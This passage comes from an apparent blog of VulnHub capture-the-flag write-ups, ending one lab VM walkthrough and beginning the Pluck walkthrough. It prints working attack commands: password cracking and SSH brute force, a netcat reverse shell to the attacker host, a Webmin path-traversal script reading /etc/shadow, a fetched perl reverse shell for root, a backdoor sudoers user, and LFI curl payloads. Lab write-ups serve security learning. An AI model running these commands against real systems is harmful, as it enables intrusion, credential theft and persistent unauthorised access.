<br /></div>
<div>
Lets see if my crappy 590GTX still works with hashcat on my windows box, I copy the hash to file hash.txt and let hashcat rip on the sha512 hash using the rockyou wordlist; </div>
<div>
<span style="color: lime;">hashcat64.exe -m 1800 -a 0 -w 1 hash.txt rockyou,.txt</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hashcat_zpshcrqdfq9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="412" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/hashcat_zpshcrqdfq9.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br />
<br /></div>
<div>
<br />
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Success! </div>
<div>
So user:password obtained;</div>
<div>
MeGustaKing:**********</div>
<div>
<br /></div>
<div>
Nice!</div>
<div>
<br /></div>
<div>
<b><i><span style="font-size: large;">SSH Fun / tr0lls.. </span></i></b></div>
<div>
======================</div>
<div>
Alright, but now we have what appear to be valid credentials in our hand! Shell seems within our grasp at last!</div>
<br />
Let's try our shiny new credentials on an ssh login;<br />
<span style="color: lime;">ssh MeGustaKing@192.168.56.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_01_zpsjti5z7ol.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="384" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_01_zpsjti5z7ol.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
What the... argh..<br />
Pfff...more tr0lls... hahaha... this guy..<br />
<br />
Well there seems to be an encoded string at the top, however try as I might, I could not decode the fucker. Later it turned out that there was actually a typo in it and that the correct string was;<br />
"<span style="white-space: pre-wrap;"><span style="color: yellow;">U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg==</span>" </span><br />
<span style="white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;">Decoding this twice with base64 results in flag number 6 (where the hell # 4 & 5 are hiding... I dunno lol, but possibly in the g4m35.ctf domain)</span><br />
<span style="white-space: pre-wrap;">FL46_6:FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/flag6_zpsinlxicn6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/flag6_zpsinlxicn6.png" width="640" /></a></div>
<span style="white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><br /></span>
<br />
<span style="white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><br /></span>
Moving on down the information in the ssh screen there is a mention of a last login from R0cKy0U.7x7, this seems a fairly obvious reference to the rockyou.txt wordlist (but last login also mentioned as being on 01-04-2017.. April fools' day..oh lordy)<br />
Also, there seems to be some alarm that the user logging in is not "burtieo" who apparently is the 54wltyD4w6..<br />
<br />
Well armed with a new username and a clear reference to the rockyou wordlist, we fire up hydra and let her do her worst on an ssh bruteforce attack. (well OK, chron1cl3 did this :P nice going dude :D)<br />
Running a bruteforce attack on an ssh login is a slow and painful process and truly the only thing you can hope for is a good hint on the password or at least a smallish, focussed wordlist.<br />
In this case the rockyou reference is pretty clear, so just have to let it run for as long as I can keep the PC on and see how far we get..;<br />
<br />
<span style="color: lime;">hydra -l burtieo -P lists/rockyou.txt -e nsr 192.168.56.102 ssh</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hydra_ssh_zpscm9icnne.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="258" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/hydra_ssh_zpscm9icnne.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, so actually this was yet another tr0ll.. haha, the actual password was written right in the login screen...<br />
<br />
But no matter, now we have another set of shiny new credentials! Yay! or do we.. on initial logging in, all seems fine, but then..<br />
<span style="color: lime;">ssh burtieo@192.168.56.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rbash_zpso0dddx93.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="314" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/rbash_zpso0dddx93.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
gah, its an rbash restricted shell..and try though I might, I was not able to easily escape this one..<br />
<br />
SSH can allow user code execution, which in this case can bypass some of the restrictions, although still not making it terribly user friendly. We can test this with;<br />
<span style="color: lime;">ssh burtieo@192.168.56.102 cat /etc/passwd</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_uce_zpsk1xya55g.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="544" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_uce_zpsk1xya55g.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, good that works, lets see if we can turn this into a simple shell for ease of use;<br />
<br />
Start up a netcat listener and then start the ssh command calling a netcat connect command,<br />
spawn a clearer shell, set environment and get busy :D<br />
<div>
<br /></div>
<div>
<span style="color: lime;">ssh burtieo@192.168.56.102 nc 192.168.56.101 4444 -e /bin/sh</span><br />
<i>enter burtieo's password</i></div>
<span style="color: lime;">python -c 'import pty; pty.spawn("/bin/sh")'</span><br />
<span style="color: lime;">export TERM=linux</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_uce_shell_zps17gnyinq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="368" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_uce_shell_zps17gnyinq.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Ahh, this is better! Looks like we are good to go and get on with further enumeration of the box.<br />
<br />
I change to writable directory /tmp and after checking that wget is installed, start apache2 on the attacking machine, host an enumeration script and then download and run it on the victim;<br />
<br />
<span style="color: lime;">cd /tmp </span><br />
<span style="color: lime;">which wget </span><br />
<span style="color: lime;">wget -q 192.168.56.101/linEnum.sh</span><br />
<span style="color: lime;">bash linEnum.sh > enum.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/upload_enum_zpsyekyi1hh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="392" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/upload_enum_zpsyekyi1hh.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Reading through the enumeration script results.. something immediately caught my eye..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sudo-l_zps8dbdllkp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/sudo-l_zps8dbdllkp.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To quote chron1cl3; "<i><b>oh shizzle!</b></i>" :D<br />
We can run a file as root, must be getting close now..<br />
<br />
When running the /usr/bin/wmstrt file, it counts down from 20 to 0 and then prints;<br />
<span style="color: yellow;">D1dyaCatchaT3nK1l0?</span><br />
<span style="color: yellow;">:D</span><br />
<div>
<br /></div>
We figured 10 kilo must be 10k / 10000, so ran a quick nmap scan during the 20 seconds of countdown time when running the wmstrt file with sudo;<br />
<span style="color: lime;">nmap -p 10000 -sV 192.168.56.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nmap_10k_zpsirhccrqo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="316" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/nmap_10k_zpsirhccrqo.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I was having real trouble with the browser not accepting the certificate and for all the googling on it the only solution I came across was downgrading the browser.. I was basically more or less giving up on it, but this is where some serious pimpness came into play in the form of <i>He Who Shall Not Be Named</i>.. otherwise known as ch3rn0byl..<br />
<br />
ch3rn whipped up a python script (dont you hate/love it when people just quickly do that while they're sitting on the john doing a crossword puzzle or some shit) which ignores SSL certificate verification and does a path traversal to be able to read files outside the web root directory.. in a few short lines...<br />
I've gotta loosen up with my bash love and get on this python bandwagon..<br />
<blockquote class="tr_bq">
import requests<br />
payload = '/..%01' * 10<br />
payload += '/etc/shadow'<br />
r = requests.get('https://192.168.56.102:10000/unauthenticated{}'.format(payload), verify=False)<br />
print r.url, r.status_code, r.reason, r.content</blockquote>
So we run the /usr/bin/wmstrt file with sudo to open up the webmin port 10000 and then run ch3rn's pimpscript;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pimp_shadow_zpsmxmpbve1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="392" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pimp_shadow_zpsmxmpbve1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Success! For shits and giggles I grabbed the root hash and ran hashcat on it using rockyou wordlist.<br />
<span style="color: lime;">hashcat64.exe -m 1800 -a 0 -w 1 hash.txt rockyou.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_hash_zpsxfgx7q6g.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="436" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_hash_zpsxfgx7q6g.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
no way.. really? More creds!<br />
<b>root:password</b><br />
<br />
In the 1st version, root was allowed to login over ssh, that made access ezpz, but it was clear this was not the author's intended route and in the revised VM the root login capability has been removed.<br />
<br />
I was sure (and so was ch3rn..) that his pimpscript could be used to leverage a file to run as root and considering we had write access to /tmp, I wanted to create a reverse shell and then have it phone home after having been called by root. and thus give that sweet rootshell..<br />
<br />
My brain was frazzled, but ch3rnobyl came through again with some awesome tidbits on webmin. <i>Well tidbits.. I'm not too proud to avoid admitting there was a fairly pretty spoon involved.. :P</i><br />
so roughly, and this part will need some serious improvement when I get my game together on this, webmin is based off perl and runs perl modules. So creating a perl module (editing extension from .pl to .cgi) and making it executable will allow us to execute that file if able to be called/reached by path traversal via the webmin service.<br />
<br />
So first we prepare a perl reverse shell;<br />
/usr/share/webshells/perl/perl-reverse-shell.pl<br />
edit the IP and PORT to our setup and then host on our attacking system.<br />
<br />
Download to our target system in the writable <b>/tmp/</b> directory, rename extension (I renamed the shell revshell.cgi) and make executable with chmod +x.<br />
<span style="color: lime;">cd /tmp</span><br />
<span style="color: lime;">wget -q 192.168.56.101/perl-reverse-shell.pl</span><br />
<span style="color: lime;">mv perl-reverse-shell.pl revshell.cgi</span><br />
<span style="color: lime;">chmod +x revshell.cgi</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/revshell_prep_zpsbxkixty5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="452" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/revshell_prep_zpsbxkixty5.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We edit the pimpscript to call the correct file. as there is no need to read the content or the like, we can delete some of the printed items, so I just left the url and status_code to be printed.<br />
<blockquote class="tr_bq">
import requests<br />
payload = '/..%01' * 4<br />
payload += '/tmp/revshell.cgi'<br />
r = requests.get('https://192.168.56.102:10000/unauthenticated{}'.format(payload), verify=False)<br />
print r.url, r.status_code</blockquote>
<div>
Start a netcat listener on the attacker, run webmin file /usr/bin/wmstrt with sudo again and in the 20 seconds run the pimpscript to call the perl reverse shell..</div>
<i>prep..</i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_prep1_zpsejbuj7zo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="570" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_prep1_zpsejbuj7zo.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i><b>pwn..</b></i><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_zpslk2om5nb.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="594" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_zpslk2om5nb.png" width="640" /></a><br />
<br />
Oh.Fuck.Yes.<br />
<br />
<br />
So this is a pretty round-about way to get to root, so lets get another user in the mix straight away with root privs so we can finally get a normal friggin root shell;<br />
<br />
<span style="color: lime;">useradd -u 12345 -g root -s /bin/bash -p $(echo epat | openssl passwd -1 -stdin) tape</span><br />
<span style="color: lime;">echo "tape ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_user1_zpsxwhdoxph.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="334" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_user1_zpsxwhdoxph.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now we can login with ssh and do a sudo su to get root privs, nice and ez!<br />
<span style="color: lime;">ssh tape@192.168.56.102 </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_tape_zpsxbfrdssv.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="426" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_tape_zpsxbfrdssv.png" width="640" /></a></div>
<span style="color: lime;"><br /></span>
<span style="color: lime;"><br /></span>
<span style="color: lime;"><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></span><span style="color: lime;">sudo su</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_tape_1_zpstppmvn5e.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="222" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_tape_1_zpstppmvn5e.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So now we've got nice an ez root access, Im gonna enumerate the bejeezus outta the g4m35.ctf domain and see if I can find flag 4 & 5 :P but for a wee moment.. enough time spent on this and time for some THS R&R! :P<br />
<br />
Think Chron1cl3 has pwned flag7, will update as and when progress is made ;)<br />
<br />
<br />
<br />
Big up to the THS crew and those participating in one way or another on this awesome VM<br />
Chron1cl3 -- <a href="https://twitter.com/chron1cl3" target="_blank">https://twitter.com/chron1cl3</a><br />
Ch3rn0byl<br />
Gr3yM4tt3r</div>
<br />
<br />
And of course many thanks to 3mrgnc3 for this great (and frustrating.. grr) ride and thanks to VulnHub for hosting these awesome VMs.<br />
<br /></div>
Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-8356530514965708840.post-42096133328000511012017-03-18T17:34:00.002+01:002017-03-29T16:48:04.762+02:00VulnHub -- Pluck -- Writeup<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b>Plucking Pluck</b><br />
<b>============</b><br />
<br />
I had a fun time going through Pluck, there were no tempting write ups available at time of testing so managed to steer clear of the easy ways out ;)<br />
<br />
Firing up netdiscover we find the host to target (which actually I saw later was conveniently mentioned in the actual Pluck VM login screen)<br />
<span style="color: lime;">netdiscover -i eth0 -P -r 192.168.110.0/24</span><br />
<span style="color: lime;">bash tools/ranger.sh</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_ranger_zpscgdcubs1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="328" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_ranger_zpscgdcubs1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
With the target identified, next stage is to see what a port scan probing open ports for service/version information reveals;<br />
<br />
<span style="color: lime;">nmap -sV -p - 192.168.110.102 2> /dev/null</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_nmap_zpsgcb6mirc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="364" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_nmap_zpsgcb6mirc.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK so ssh, http, mysql and an as yet to be determined service to poke around at.<br />
<br />
Going through the http pages, we see a Home, About, Contact and Admin pages.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_webpage_zpsx8syrslp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="564" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_webpage_zpsx8syrslp.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The Admin page has a login, however it requires an email address and I was not able to find any information on correct email address formats.<br />
Testing with various email formats did not get any helpful error message.<br />
<br />
Tried to get some helpful sql errors, and entering <span style="color: lime;">'</span> as email address did result in ;<br />
<i>"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6" </i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_admin-webpage_zpso5zucli2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="564" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_admin-webpage_zpso5zucli2.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I was unable to get any further so decided to leave that route for what it was for the time being.<br />
Not sure whether there is anything to be found with the sql in the login, will have to dig a bit more.<br />
<br />
<br />
<b>FORCED BROWSING</b><br />
With the hope of an easy entry fading, I checked if any easily identified files/directories could be found;<br />
<br />
<span style="color: lime;">dirb http://192.168.110.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_dirb_zpsvk8lg8sa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_dirb_zpsvk8lg8sa.png" width="568" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: lime;">wfuzz -c -w /usr/share/seclists/Discovery/Web-content/big.txt --hc 404 192.168.110.102/FUZZ</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_wfuzz_zpsgib5pdsb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="340" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_wfuzz_zpsgib5pdsb.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nothing interesting standing out..<br />
<br />
I actually also even ran cewl on the 'About' page of the server and ran a forced browse attack using that custom wordlist, but also no dice.<br />
<br />
<b>SSH</b><br />
Port 22 was open, so I decided to run a bruteforce with the most common 10k passwords on ssh with username admin as there appeared to be an admin login on http, you never know, right?<br />
<div>
<span style="color: lime;">hydra -l admin -P /lists/10k.txt -e nsr -t 4 -Vf 192.168.110.102 ssh</span> </div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_ssh-hydra_zpsw2rnkkmi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="372" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_ssh-hydra_zpsw2rnkkmi.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Predictable outcome though; no dice.<br />
<div>
<br /></div>
<b>MYSQL </b><br />
Trying mysql login in turned out to be a no-go as well..<br />
<span style="color: lime;">mysql -h 192.168.110.102- uroot -ptoor</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_mysql_zpsj7ge0acd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="154" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_mysql_zpsj7ge0acd.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
pfff... things were beginning to look a little bleak..<br />
<br />
<br /></div>
<div>
<b>MY SAVIOUR: NIKTO</b><br />
Running nikto showed an interesting LFI vulnerability, allowing viewing of any file on the target.</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/saviour_zpso4ly4ct6.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="368" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/saviour_zpso4ly4ct6.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
<div>
<span style="color: lime;">nikto -h 192.168.110.102</span></div>
<div>
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_nikto_zps2igydyxw.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="476" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_nikto_zps2igydyxw.png" width="640" /></a></div>
<div>
<br />
Checking the LFI vulnerabilty with curl indeed showed the file.. </div>
<div>
Finally.. progress!<br />
<span style="color: lime;">curl -s 192.168.110.102/index.php?page=../../../../../../../../../../etc/passwd</span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_1_zps7sel4yg3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="612" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_1_zps7sel4yg3.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Ohh.. usernames, I took the usernames and went to town with yet more bruteforce attacks on ssh.. maybe bob, paul or peter would have better results than that crappy 'ol admin!<br />
Nope..no dice..it was not meant to be..<br />
<br />
<br />
Looking again at the passwd file some interesting information stands out on the backup-user showing a location of a backup script.<br />
<br />
Let's see if we can dig that one out;<br />
<span style="color: lime;">curl -s 192.168.110.102/index.php?page=../../../../../../../../../../usr/local/scripts/backup.sh</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_backup-sh_zpsbrnpjcjr.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="526" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_backup-sh_zpsbrnpjcjr.png" width="640" /></a></div>
<br />
<br />
<br />
<br /></div>
<div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, looks like there may be a backup file to poke at..<br />
<br />
Let's see if we can download the backup file, despite the mention of tftp, I just tried with curl and man the download just kept on going.. at 2GB I cancelled the download in the hopes that something could be extracted..<br />
<br />
<span style="color: lime;">curl 192.168.110.102/index.php?page=../../../../../../../../../../backups/backup.tar > backup.tar</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_tar_zpswx08tqkd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="114" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_tar_zpswx08tqkd.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
First I did a quick manual check to see if a quick scroll through the first few hundred lines had anything jumping out, and something did..!<br />
<span style="color: lime;">cat backup.tar | head -n 500 | less</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_rsa-ssh_zpsauq3bjha.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="338" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_rsa-ssh_zpsauq3bjha.png" width="640" /></a><br />
<br />
hmm.. user paul and ssh rsa keys? Looking more promising now!<br />
<br />
Some handy information which google was kind enough to cough up for me;<br />
<a href="https://support.rackspace.com/how-to/logging-in-with-an-ssh-private-key-on-linuxmac/" target="_blank">https://support.rackspace.com/how-to/logging-in-with-an-ssh-private-key-on-linuxmac/</a><br />
<div>
<br /></div>
